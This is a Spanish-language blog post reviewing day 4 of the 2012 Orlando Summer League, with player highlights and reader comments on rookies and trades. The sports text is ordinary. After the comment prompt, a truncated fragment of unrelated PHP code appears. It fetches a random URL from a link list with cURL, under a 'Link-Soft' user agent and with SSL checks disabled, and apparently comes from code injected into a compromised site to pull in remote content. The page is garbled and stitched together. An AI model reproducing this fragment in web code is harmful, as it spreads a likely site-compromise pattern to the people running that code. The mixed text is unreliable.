Orlando Summerleague: Día 4

13 de July de 2012 por txusma

bknightDías de contrastes. Por un lado, el fenomenal partido entre Nets y Thunder y por el otro, el bodrio, a pesar de las 2 prórrogas, entre Sixers y Magic.

Destacados

Brandon Knight: El base de los Pistons se desquitó de su mala actuación de hace 2 días y ofreció todo un recital. 19 puntos y 14 asistencias que catapultaron a los suyos a la victoria. La mejor actuación de un base hasta la fecha.

Dwight Buycks: Nadie drafteó el año pasado a este base proveniente de Marquette. Los Suns lo tuvieron un tiempo en plantilla pero jugó buena parte de la temporada en Tulsa, equipo afiliado a los Thunder en la D-League. Anoche jugó de titular en sustitución de Reggie Jackson y nos dejó 22 puntos con un 10 de 15 en tiros de campo con 5 asistencias de regalo.

Tyshawn Taylor: El base de los Nets empezó fuertísimo con un 6 de 6 en tiros de campo. Lamentablemente redondeó su actuación con 3 de 12 y fallando 2 bandejas en los segundos finales que hubieran empatado el partido. De toda manera, dejó buenas sensaciones aunque le quede mucho trabajo por delante.

Kris Joseph: Va a más a cada partido. El ex de Syracuse anotó 17 puntos y recogió 11 rebotes.

Alec Burks: La Summerleague se le queda bastante pequeña. Anotó de nuevo 22 puntos que redondeó con 7 rebotes, 5 asistencias y 3 robos.

Justin Harper: El alero de los Magic fue el mejor de largo de su equipo. Fue el único capaz de anotar con fluidez en un partido feo y trabado. Acabó con 18 puntos y 10 rebotes.

A seguir

Andre Drummond: Poco a poco para que el pívot de los Pistons se va animando. Anoche fueron 10 puntos, 8 rebotes y 2 tapones.

Jared Sullinger: Una de las estrellas de esta summer league no estuvo muy afinado de cara a canasta (2 de 9 en tiro) pero capturó 7 rebotes. Se aprecian signos de fatiga. Quieras que no, es el 4º partido en 4 días.

Al Thorton: Seguro que todos recordáis a Al Thorton, aquel jugador que tan buena pinta tenía después de su temporada rookie en los Clippers. Pues lo tenemos en los Nets intentando ganarse un puesto y de momento no va muy desencaminado. Anoche consiguió 19 puntos.

Enes Kanter: El turco es el máximo reboteador de la competición con 9 capturas de media. Anoche volvió a dejarnos un doble-doble, esta vez de 12 puntos y 11 rebotes. Ha de controlar las pérdidas (7).

Miles Plumlee: ¿Será verdad lo de Plumlee? 15 puntos (6 de 7) y 6 rebotes para un jugador que parece un clon de Jeff Foster.

Andrew Nicholson: La fatiga le está pasando factura y sólo fue capaz de anotar 6 puntos. Eso sí, se fue a los 10 rebotes que lo mantienen entre los mejores reboteadores de la competición.

Decepciones

Fab Melo: Si un pívot no es capaz de destacar en las ligas de verano es que tiene un problema gordo. Melo salió de titular pero se quedó sin anotar. Carne de D-League.

Adam Morrison: Consiguió la primera canasta de esta Summerleague y a partir de ahí ha ido en caída libre. Morrison está muy lejos de lo que parecía iba a ser. No tiene sitio en la NBA.

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    wow! q partido de marshon brooks, se creia que seria el goleador del torneo y sensacion a la vez, tuvo un pesimo primer juego (luego los clippers parece que se borraron en el trade que lo llevaria alli), y de a poco se fue recuperando, mejoro frente a boston, gran partido frente a los 76s, y frente a los pacers, la friolera de 34 puntos!!! numeros de un jugador que esta por encima del resto en este torneo

      Citar

  2. Sancho88 dice:
    #2

    Bueno, no me voy del todo, jejej. Pero comento que Montiejunas se ha comido a todos con un 25-9 en 25 minutos y me voy. Símplemente se le queda pequeña esa liguilla y ya demuestra que está preparado para lo gordo. Repito que por encima de todos los rookies, yo tengo muchas ganas de ver el duelo de lituanos Valanciunas-Montiejunas. Vaya parejita de futuro para la selección lietuva…

    Tb han jugado muy bien Terrence Jones y Jeremy Lamb. En serio, el tri-traspaso tiene sentido, los Magic si piyan las rondas de Houston podrían empezar de cero muy muy bien, con buenas expectativas. Ah, y no lo comenté en el anterior comentario, pero tb me olvidé de que Turkoglu caería en Houston tb junto a Pau y Bynum, en mi traspaso imaginario. Xau

      Citar

  3. Esteban dice:
    #3

    Montejunas tiene pinta de estar en nivel intermedio, esilo stephenson, le queda chica la liga de verano y grande la nba

    Mas alla de eso, comparto q los rookies de los rockets, son una muy buena base desde donde costruir, espero q sea en houston, q pierdan muchos partidos y q tengan un pick 3 el año q viene, seria el comienzo de una era

      Citar

  4. nba dice:
    #4

    Y yo que pensaba que Morrison despues de su etapa europea conseguiria aportar mas, veo a Jordan firmandolo por el minimo

      Citar

  5. Esteban dice:
    #5

    creo que al fin una vez los especialistas ha acertado y este es un draft de coña! mamita!! q jugadores

    a davis no lo hemos podido ver, una pena

    pero el resto se trae cosas importantisimas

    MKG 18 puntos
    BEAL 22
    WAITERS
    ROBINSON 19
    BARNES 23
    ROSS 21
    DRUMMOND bueno de el sabiamos que le faltaba, pero tampoco lo ha hecho tan mal
    para cerrar el top 10, no he visto a rivers

    pero que jugadores, que dominio, una generacion a la altura de lebron, wade, melo y compañia

      Citar

  6. Esteban dice:
    #6

    bueno y por las dudas este año tambien debutaran Valanciunas y Montejunas

    y jeremy lamb y sullinger pintan para robos

      Citar

  7. Sancho88 dice:
    #7

    y sin olvidarnos de los rookies de houston, sullinger, plumlee…

    Sobre la generación, creo que todos coincidimos en que hay un gran nivel (coño Gilchrist…. lo de ese tipo no es ni medio normal), pero yo tb he leído por ahí de todo, gente que dice que es una generación de mierda… pero bueno, realmente ahora hay que estar escépticos esperando a ver qué hacen y verles competir contra los grandes. Ahí podremos juzgar, aunque las sensaciones son inmejorables

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>